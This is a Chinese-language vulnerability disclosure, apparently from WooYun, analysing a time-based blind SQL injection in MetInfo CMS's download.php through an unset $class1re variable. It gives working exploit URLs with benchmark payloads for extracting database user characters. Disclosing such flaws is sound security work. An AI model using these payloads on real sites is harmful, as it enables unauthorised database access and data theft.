WooYun.org

直接代码分析：
download.php:

require_once '../include/common.inc.php';
$mdname = 'download';
$showname = 'showdownload';
$dbname = $met_download;
$dbname_list = $met_download_list;
$mdmendy = 1;
require_once '../include/global/listmod.php';

然后跳到
listmod.php：

$class1_info=$class_list[$class1]['releclass']?$class_list[$class_list[$class1]['releclass']]:$class_list[$class1];
$class2_info=$class_list[$class1]['releclass']?$class_list[$class1]:$class_list[$class2];
$class3_info=$class_list[$class1]['releclass']?$class_list[$class2]:$class_list[$class3];
if(!is_array($class1_info))okinfo('../404.html');
$class1sql=" class1='$class1' ";
if($class1&&!$class2&&!$class3){
	foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){
		if($val['releclass']==$class1){
			$class1re.=" or class1='$val[id]' ";
		}
	}
	if($class1re){
		$class1sql='('.$class1sql.$class1re.')';
	}
}

第一步
满足if(!is_array($class1_info))okinfo('../404.html');
第二部
不满足foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){
那么我们就质控出来一个
$class1re
ok分析完毕 发送url:
http://localhost:8080/metinfo/download/download.php?class_list[][id]=mmm&class1=1&class1re=) or (1) ) ) or if(ascii(substr(user(),1,1))=114,benchmark(1000000,md5(1)),1)-- sd
造成时间延时 后台抓取sql语句
2015-01-31 23:53 SELECT * FROM met_download where lang='cn' and (recycle='0' or recycle='-1') and (( ( class1='1' ) or (1) ) ) or if(1,banchmark(1000000,md5(1)),1)-- sd) ) )and displaytype='1' order by top_ok desc,no_order desc,updatetime desc,id desc LIMIT 0, 8
114 这个地方是一个php变量后续可以进行替换猜测敏感信息，我们替换一下
http://localhost:8080/metinfo/download/download.php?class_list[][id]=mmm&class1=1&class1re=) or (1) ) ) or if(ascii(substr(user(),1,1))=$NUM,benchmark(1000000,md5(1)),1)-- sd
然后就可以去猜测敏感信息了